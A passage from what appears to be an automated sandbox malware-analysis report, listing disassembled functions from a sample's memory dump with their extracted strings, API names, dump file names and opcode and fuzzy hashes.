                                                        • Instruction Fuzzy Hash: 8941B0317047029FD725DE29C840B6AB7E5EB88725F100A2EE99ADB780DB71EC05CF91
                                                        Function 02D3B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02D7728C
                                                        Strings
                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02D77294
                                                        • RTL: Re-Waiting, xrefs: 02D772C1
                                                        • RTL: Resource at %p, xrefs: 02D772A3
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-605551621
                                                        • Opcode ID: a3a42d50f025186d996bfd0a55019ca87bf69da04023b1f150f85eb08b7b0260
                                                        • Instruction ID: a862aab1cd262c2b8b43522f1f8ab89f8935a583436b29701c53bde9f699863c
                                                        • Opcode Fuzzy Hash: a3a42d50f025186d996bfd0a55019ca87bf69da04023b1f150f85eb08b7b0260
                                                        • Instruction Fuzzy Hash: E141F432700202ABEB11DE24CC41F66B7A5FF54728F144A19F995DB340EB24EC41CBE1
                                                        Function 02DB2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$]:%u
                                                        • API String ID: 48624451-3050659472
                                                        • Opcode ID: cdcd5ec1395bb6d0bcfbc0fcbb462cd85474be65c356849ff8c82e373a86c64b
                                                        • Instruction ID: 2a07e7cb9a976db1a1d19268d83e56521dc6d79ba26529236e0a931e56be3f99
                                                        • Opcode Fuzzy Hash: cdcd5ec1395bb6d0bcfbc0fcbb462cd85474be65c356849ff8c82e373a86c64b
                                                        • Instruction Fuzzy Hash: 3D316472A00119DFDB61DE28CC54BEE77A8EF44714F84055AAC8AD3300EB309E458F60
                                                        Function 03022AD0 Relevance: 6.3, Strings: 5, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4153372963.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3020000_fc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ,hi$i ,n$j`mx$kve|$~
                                                        • API String ID: 0-3524548386
                                                        • Opcode ID: ab7ec69f4c1aab67319ce5f0cc4f4fa35e43e98db55b9e28669ad05716d61e6f
                                                        • Instruction ID: d5917a95c657bde4cda6ec8468b814202d023085361fa2506daa646c6fc05295
                                                        • Opcode Fuzzy Hash: ab7ec69f4c1aab67319ce5f0cc4f4fa35e43e98db55b9e28669ad05716d61e6f
                                                        • Instruction Fuzzy Hash: 51F09070118B888FD745AF04D408766B7D0FF9930CF90165EE489CB291DB358241CB86
                                                        Function 02D47D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-
                                                        • API String ID: 1302938615-2137968064
                                                        • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                        • Instruction ID: dd39dfc99c0b1564564bf7091e996ac3fab193773db33a5aa12d975df8cfa5e9
                                                        • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                        • Instruction Fuzzy Hash: C6916E70E002169BEB24DE69C881ABEF7A5EF44764F64472AE855EB3C0DF349D41CB60
                                                        Function 02D09126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$@
                                                        • API String ID: 0-1194432280
                                                        • Opcode ID: 7760882906057e041b920c864e9720e433bc26b9f560346edcf81836e53fc4ee
                                                        • Instruction ID: 62950db29efc13e414246dd4efe86ec068e63d540b4a94324b013c754615392b
                                                        • Opcode Fuzzy Hash: 7760882906057e041b920c864e9720e433bc26b9f560346edcf81836e53fc4ee
                                                        • Instruction Fuzzy Hash: 25812A71D012699BDB35CB54CC58BEEB7B9AF08714F0041EAAA19B7790D7309E84CFA1